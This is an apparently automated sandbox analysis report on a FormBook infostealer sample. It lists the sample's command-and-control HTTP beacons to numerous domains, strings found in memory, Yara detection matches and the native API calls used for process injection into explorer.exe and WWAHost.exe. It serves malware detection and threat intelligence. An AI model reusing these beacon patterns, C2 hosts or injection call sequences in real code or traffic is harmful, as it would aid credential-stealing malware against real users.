            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.maconanimalexterminator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1Host: www.pelisplusxd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.allismd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.central-car-sales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1Host: www.nolarapper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1Host: www.promanconsortium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1Host: www.profille-sarina23tammara.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.restaurantsilhouette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.bimetalthermostatksd.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:40:18 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000002.00000002.1030409117.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: WWAHost.exe, 00000006.00000002.1029486637.000000000250A000.00000004.00000020.sdmpString found in binary or memory: http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOC
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: WWAHost.exe, 00000006.00000002.1030966590.00000000037E2000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004181B0 NtCreateFile,1_2_004181B0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00418260 NtReadFile,1_2_00418260
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004182E0 NtClose,1_2_004182E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,1_2_00418390
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004181AB NtCreateFile,1_2_004181AB
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041825A NtReadFile,1_2_0041825A
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004182DD NtClose,1_2_004182DD
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01179910
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011799A0 NtCreateSection,LdrInitializeThunk,1_2_011799A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179840 NtDelayExecution,LdrInitializeThunk,1_2_01179840
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01179860
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011798F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_011798F0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01179A00
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A20 NtResumeThread,LdrInitializeThunk,1_2_01179A20
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A50 NtCreateFile,LdrInitializeThunk,1_2_01179A50
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179540 NtReadFile,LdrInitializeThunk,1_2_01179540
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011795D0 NtClose,LdrInitializeThunk,1_2_011795D0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179710 NtQueryInformationToken,LdrInitializeThunk,1_2_01179710
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179780 NtMapViewOfSection,LdrInitializeThunk,1_2_01179780
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011797A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_011797A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179FE0 NtCreateMutant,LdrInitializeThunk,1_2_01179FE0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01179660
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011796E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_011796E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179950 NtQueueApcThread,1_2_01179950
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011799D0 NtCreateProcessEx,1_2_011799D0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179820 NtEnumerateKey,1_2_01179820
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117B040 NtSuspendThread,1_2_0117B040
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011798A0 NtWriteVirtualMemory,1_2_011798A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179B00 NtSetValueKey,1_2_01179B00
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A3B0 NtGetContextThread,1_2_0117A3B0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A10 NtQuerySection,1_2_01179A10
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179A80 NtOpenDirectoryObject,1_2_01179A80
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117AD30 NtSetContextThread,1_2_0117AD30
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179520 NtWaitForSingleObject,1_2_01179520
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179560 NtWriteFile,1_2_01179560
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011795F0 NtQueryInformationFile,1_2_011795F0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A710 NtOpenProcessToken,1_2_0117A710
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179730 NtQueryVirtualMemory,1_2_01179730
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0117A770 NtOpenThread,1_2_0117A770
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179770 NtSetInformationFile,1_2_01179770
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179760 NtOpenProcess,1_2_01179760
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179610 NtEnumerateValueKey,1_2_01179610
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179650 NtQueryValueKey,1_2_01179650
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01179670 NtQueryInformationProcess,1_2_01179670
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011796D0 NtCreateKey,1_2_011796D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199710 NtQueryInformationToken,LdrInitializeThunk,6_2_03199710
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199780 NtMapViewOfSection,LdrInitializeThunk,6_2_03199780
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199FE0 NtCreateMutant,LdrInitializeThunk,6_2_03199FE0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A50 NtCreateFile,LdrInitializeThunk,6_2_03199A50
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199650 NtQueryValueKey,LdrInitializeThunk,6_2_03199650
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03199660
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031996D0 NtCreateKey,LdrInitializeThunk,6_2_031996D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031996E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_031996E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_03199910
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199540 NtReadFile,LdrInitializeThunk,6_2_03199540
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031999A0 NtCreateSection,LdrInitializeThunk,6_2_031999A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031995D0 NtClose,LdrInitializeThunk,6_2_031995D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199840 NtDelayExecution,LdrInitializeThunk,6_2_03199840
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199860 NtQuerySystemInformation,LdrInitializeThunk,6_2_03199860
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A710 NtOpenProcessToken,6_2_0319A710
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199B00 NtSetValueKey,6_2_03199B00
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199730 NtQueryVirtualMemory,6_2_03199730
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199770 NtSetInformationFile,6_2_03199770
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A770 NtOpenThread,6_2_0319A770
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199760 NtOpenProcess,6_2_03199760
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319A3B0 NtGetContextThread,6_2_0319A3B0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031997A0 NtUnmapViewOfSection,6_2_031997A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199610 NtEnumerateValueKey,6_2_03199610
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A10 NtQuerySection,6_2_03199A10
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A00 NtProtectVirtualMemory,6_2_03199A00
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A20 NtResumeThread,6_2_03199A20
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199670 NtQueryInformationProcess,6_2_03199670
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199A80 NtOpenDirectoryObject,6_2_03199A80
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319AD30 NtSetContextThread,6_2_0319AD30
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199520 NtWaitForSingleObject,6_2_03199520
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199950 NtQueueApcThread,6_2_03199950
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199560 NtWriteFile,6_2_03199560
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031999D0 NtCreateProcessEx,6_2_031999D0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031995F0 NtQueryInformationFile,6_2_031995F0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03199820 NtEnumerateKey,6_2_03199820
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0319B040 NtSuspendThread,6_2_0319B040
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031998A0 NtWriteVirtualMemory,6_2_031998A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031998F0 NtReadVirtualMemory,6_2_031998F0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003381B0 NtCreateFile,6_2_003381B0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00338260 NtReadFile,6_2_00338260
